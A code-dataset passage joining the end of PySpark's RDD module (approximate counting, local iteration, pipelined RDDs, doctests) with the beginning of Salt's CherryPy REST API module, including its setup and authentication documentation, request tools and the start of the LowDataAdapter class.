jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
`"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available here
<http://dx.doi.org/10.1145/2452376.2452456>`_.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
with SCCallSiteSync(self.context) as css:
sock_info = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd())
return _load_from_socket(sock_info, self._jrdd_deserializer)
def _prepare_for_python_RDD(sc, command):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have the same life cycle as the created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars]
sc._pickled_broadcast_vars.clear()
return pickled_command, broadcast_vars, sc.environment, sc._python_includes
def _wrap_function(sc, func, deserializer, serializer, profiler=None):
assert deserializer, "deserializer should not be empty"
assert serializer, "serializer should not be empty"
command = (func, profiler, deserializer, serializer)
pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec,
sc.pythonVer, broadcast_vars, sc._javaAccumulator)
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer, profiler)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func,
self.preservesPartitioning)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module. Version 3.2.3 is currently recommended when
SSL is enabled, since this version worked the best with SSL in
internal testing. Versions 3.2.3 - 4.x can be used if SSL is not enabled.
Be aware that there is a known
`SSL error <https://bitbucket.org/cherrypy/cherrypy/issue/1298/ssl-not-working>`_
introduced in version 3.2.5. The issue was reportedly resolved with
CherryPy milestone 3.3, but the patch was committed for version 3.6.1.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OSes and Linux distros.
Some package systems ship a separate ``salt-api`` package, while others include
salt-api in the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
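For example, a minimal entry for the ``saltdev`` user used in the examples
below (an illustrative sketch; adjust the eauth backend and permissions for
your environment):
.. code-block:: yaml
external_auth:
  auto:
    saltdev:
      - .*
      - '@runner'
      - '@wheel'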
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx. A combined example configuration is shown
after this list.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log_access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log_error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to an SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
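For reference, here is a combined example exercising several of the options
above. All values are illustrative and should be adapted to the deployment
(in particular the filesystem paths):
.. code-block:: yaml
rest_cherrypy:
  port: 8000
  host: 0.0.0.0
  debug: False
  ssl_crt: /etc/pki/tls/certs/localhost.crt
  ssl_key: /etc/pki/tls/certs/localhost.key
  thread_pool: 100
  max_request_body_size: 1048576
  static: /srv/salt-api/static
  static_path: /static
  app: /srv/salt-api/index.html
  app_path: /app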
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
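If cookie handling is not convenient, the token returned by the login call can
be sent explicitly in the :mailheader:`X-Auth-Token` header instead (a sketch
building on the session above):
.. code-block:: python
>>> login = session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
}).json()
>>> token = login['return'][0]['token']
>>> requests.post('http://localhost:8000',
headers={'X-Auth-Token': token},
json=[{'client': 'local', 'tgt': '*', 'fun': 'test.ping'}])
<Response [200]>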
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`client interfaces <netapi-clients>`
documentation, but in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent, but they typically manage Master-side resources such as state
files, pillar files, and the Salt config files; the :py:mod:`key wheel module
<salt.wheel.key>` exposes functionality similar to the ``salt-key`` CLI
command.
Most clients have variants such as synchronous or asynchronous execution, as well as
others like batch execution. See the :ref:`full list of client interfaces
<netapi-clients>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
but cannot express complex data structures, which are often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but it can be brittle;
since salt-api accepts JSON, it is best to just send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
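The same call can be sent as JSON instead, which sidesteps the urlencoded
limitations noted below (a sketch reusing the job id from above):
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Content-Type: application/json' \\
-d '[{"client": "runner", "fun": "jobs.lookup_jid", "jid": "20150129182456704682"}]'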
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import json
import os
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
# pylint: disable=import-error
import cherrypy
import yaml
import salt.ext.six as six
# pylint: enable=import-error
# Import Salt libs
import salt
import salt.auth
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_api_acl_tool(username, request):
'''
.. versionadded:: 2016.3.0
Verifies user requests against the API whitelist (user/IP pairs) in order
to provide whitelisting for the API similar to the master, but over the API.
.. code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
'''
failure_str = ("[api_acl] Authentication failed for "
"user {0} from IP {1}")
success_str = ("[api_acl] Authentication sucessful for "
"user {0} from IP {1}")
pass_str = ("[api_acl] Authentication not checked for "
"user {0} from IP {1}")
acl = None
# Salt Configuration
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get('api_acl', None)
ip = request.remote.ip
if acl:
users = acl.get('users', {})
if users:
if username in users:
if ip in users[username] or '*' in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and '*' in users:
if ip in users['*'] or '*' in users['*']:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
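The list lives under the ``rest_cherrypy`` section of the master config, for
example (the addresses below are placeholders):
.. code-block:: yaml
rest_cherrypy:
  authorized_ips:
    - 127.0.0.1
    - 10.0.0.5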
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
cherrypy.response.status = 403
return {
'status': cherrypy.response.status,
'return': "Bad IP",
}
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
'''
Check a CORS preflight request and return a valid response
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = ['X-Auth-Token', 'Content-Type']
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
return {}
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
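The tool is registered below as ``cherrypy.tools.cors_tool`` and can be turned
on with the usual CherryPy tool config key (illustrative):
.. code-block:: python
_cp_config = {'tools.cors_tool.on': True}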
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# If this is a non-simple CORS preflight request swap out the handler.
if cherrypy.request.method == 'OPTIONS':
cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except (cherrypy.TimeoutError, salt.exceptions.SaltClientTimeout):
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc:
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc())
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
try:
return out(ret)
except Exception:
msg = 'Could not serialize the return data from Salt.'
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
request.handler = hypermedia_handler
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
# functools.wraps is applied to the inner wrapper so the processor's
# metadata is preserved and the skip logic actually runs.
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors are all intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, collections.Mapping):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
cherrypy.tools.html_override = cherrypy.Tool('on_start_resource',
html_override_tool, priority=53)
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
salt_token_tool, priority=55)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
hypermedia_in)
cherrypy.tools.cors_tool = cherrypy.Tool('before_request_body',
cors_tool, priority=30)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# If the lowstate loaded isn't a list, let's notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if cherrypy.session.get('user'):
chunk['__current_eauth_user'] = cherrypy.session.get('user')
if cherrypy.session.get('groups'):
chunk['__current_eauth_groups'] = cherrypy.session.get('groups')
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
